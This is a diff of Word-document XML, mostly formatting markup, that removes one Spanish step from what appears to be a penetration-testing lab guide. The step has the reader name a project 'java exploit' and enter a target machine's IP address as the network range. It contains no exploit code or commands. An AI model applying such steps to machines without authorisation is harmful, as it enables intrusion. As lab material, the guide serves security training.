-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>25.</w:t>
-        <w:tab/>
-        <w:t xml:space="preserve">Aparece la ventana del proyecto. En la sección de configuración del proyecto, escriba java exploit en el campo de texto Nombre del proyecto, ingrese una descripción en el campo de texto Descripción e ingrese la dirección IP de una máquina de destino en el campo de texto de rango de red. </w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -13508,6 +11337,14 @@
       <w:bCs w:val="false"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="ListLabel13">
+    <w:name w:val="ListLabel 13"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:b w:val="false"/>
+      <w:bCs w:val="false"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="paragraph" w:styleId="Heading">
     <w:name w:val="Heading"/>
     <w:basedOn w:val="Normal"/>
